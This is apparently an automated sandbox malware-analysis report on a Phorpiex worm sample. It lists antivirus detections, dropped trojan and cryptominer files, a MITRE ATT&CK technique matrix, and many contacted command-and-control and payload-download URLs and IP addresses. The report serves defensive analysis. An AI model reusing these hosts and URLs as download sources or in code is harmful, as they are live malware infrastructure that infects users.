Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004013B0 CreateEventA,socket,bind,CreateThread,	6_2_004013B0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	19_2_00401470
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	19_2_00402020
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	19_2_0040E190
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004013B0 CreateEventA,socket,bind,CreateThread,	19_2_004013B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	31 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	21 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	11 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	1 Scheduled Task/Job	21 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	311 Process Injection	2 Obfuscated Files or Information	NTDS	38 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	1 Scheduled Task/Job	11 DLL Side-Loading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	1 Registry Run Keys / Startup Folder	231 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	311 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
T52Z708x2p.exe	60%	Virustotal		Browse
T52Z708x2p.exe	61%	ReversingLabs	Win64.Worm.Phorpiex
T52Z708x2p.exe	100%	Avira	W32/Infector.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Local\Temp\1706633239.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\65841553.exe	100%	Avira	WORM/Phorpiex.olrti
C:\Users\user\AppData\Local\Temp\236013504.exe	100%	Avira	TR/Dldr.Agent.daypt
C:\Users\user\AppData\Local\Temp\1332331323.exe	100%	Avira	WORM/Phorpiex.olrti
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\446629599.exe	100%	Avira	HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2448028260.exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Local\Temp\281653412.exe	100%	Avira	TR/Dldr.Agent.daypt
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1706633239.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\158238779.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\193938922.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\65841553.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\70AF.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1332331323.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\446629599.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2448028260.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	66%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	82%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\1332331323.exe	76%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\1378231302.exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\158238779.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\AppData\Local\Temp\1706633239.exe	82%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\193938922.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\AppData\Local\Temp\2311326414.exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\236013504.exe	58%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\2448028260.exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Temp\281653412.exe	58%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\446629599.exe	82%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\65841553.exe	76%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\70AF.exe	66%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	76%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\sysppvrdnvs.exe	82%	ReversingLabs	Win32.Trojan.MintZard
C:\Windows\sysppvrdnvs.exe	82%	ReversingLabs	Win32.Trojan.MintZard

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
twizt.net	20%	Virustotal		Browse
twizthash.net	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://185.215.113.66/reg.php?s=%s	16%	Virustotal		Browse
http://91.202.233.141/ALLBSTATAASASD	18%	Virustotal		Browse
http://185.215.113.66/5S	17%	Virustotal		Browse
http://91.202.233.141/TLOADEDBROMozilla/5.0	10%	Virustotal		Browse
http://91.202.233.141/dwntbl	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
twizt.net	185.215.113.66	true	true	20%, Virustotal, Browse	unknown
twizthash.net	185.215.113.66	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.66/pei.exe	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.66/reg.php?s=%s	281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	false	16%, Virustotal, Browse	unknown
http://91.202.233.141/ALLBSTATAASASDMozilla/5.0	2311326414.exe, 00000020.00000000.1940403139.00000000007A2000.00000002.00000001.01000000.0000000D.sdmp, 2311326414.exe, 00000020.00000002.1991188613.00000000007A2000.00000002.00000001.01000000.0000000D.sdmp, sysppvrdnvs.exe, 00000023.00000002.2636883444.00000000033D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/4e	sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/1(	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/5H	sysppvrdnvs.exe, 00000006.00000002.1963842590.0000000002E9C000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/2	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/4T	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/dwntblli	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/4S	sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/8	2311326414.exe, 00000020.00000002.1991439592.000000000144F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/5	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2637160911.000000000357B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/3	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/4	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nuget.org/nuget.exe	powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.141/ALLBSTATAASASD	2311326414.exe, 00000020.00000002.1991439592.000000000144F000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse	unknown
http://91.202.233.141/dwntbl	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1963486595.0000000002CCD000.00000004.00000010.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960938007.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1963772224.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2636322759.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse	unknown
http://91.202.233.141/TLOADEDBROMozilla/5.0	281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	false	10%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000002E.00000002.2067077461.000002949F531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AD41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.66/5S	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse	unknown
http://185.215.113.66/1rosoft	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twizt.net/	70AF.exe, 00000004.00000002.1497197791.000000000092A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://twizt.net/.C	70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://twizt.net/peinstall.php6R	70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.141/ALLBSTATAASASD&	2311326414.exe, 00000020.00000002.1991439592.0000000001469000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/4&	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.66/5	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/4	sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/3	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/2	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1m	sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/4y	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/pei.exeDl	T52Z708x2p.exe, 00000001.00000002.1398060656.0000000000421000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1	sysppvrdnvs.exe, 00000023.00000002.2636446541.0000000002F2C000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/ALLBSTATAASASD7s&	2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/reg.php?s=%sMozilla/5.0	281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://185.215.113.84/nxmr.exeystem32	1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/ALLBSTATAASASD00	2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/pei.exeumpe	T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/5&	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://twizt.net/peinstall.php%temp%%s	T52Z708x2p.exe, 00000001.00000003.1397236158.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	true		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000002E.00000002.2067077461.000002949F759000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.66/S	sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/tography	sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/41	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/ALLBSTATAASASD/sN	2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://twizt.net/newtpp.exe	70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497197791.000000000092A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://twizt.net/peinstall.php	70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	true		unknown
http://185.215.113.66/1:	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.84/nxmr.exe	1332331323.exe, 0000001D.00000002.1982106656.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp, 65841553.exe	false		unknown
http://185.215.113.66/pei.exeTTC:	T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1A	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1B	sysppvrdnvs.exe, 00000006.00000003.1609744696.0000000000596000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/	1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	true		unknown
http://twizt.net/peinstall.php/peinstall.phpshqos.dll.mui	70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://twizt.net/peinstall.phpCx	70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.66/1C	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/der	sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.84/nxmr.exeP0	1332331323.exe, 0000001D.00000000.1855553229.0000000000952000.00000002.00000001.01000000.0000000C.sdmp, 1332331323.exe, 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/envelope/	sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	false	URL Reputation: safe	unknown
http://twizt.net/newtpp.exel	70AF.exe, 00000004.00000002.1497197791.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.66/11	sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/2:	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1a	sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1e	sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.66/	T52Z708x2p.exe, 00000001.00000003.1397284019.0000000000482000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398181396.0000000000485000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	true		unknown
http://185.215.113.66/1LMEM08	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/4&	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
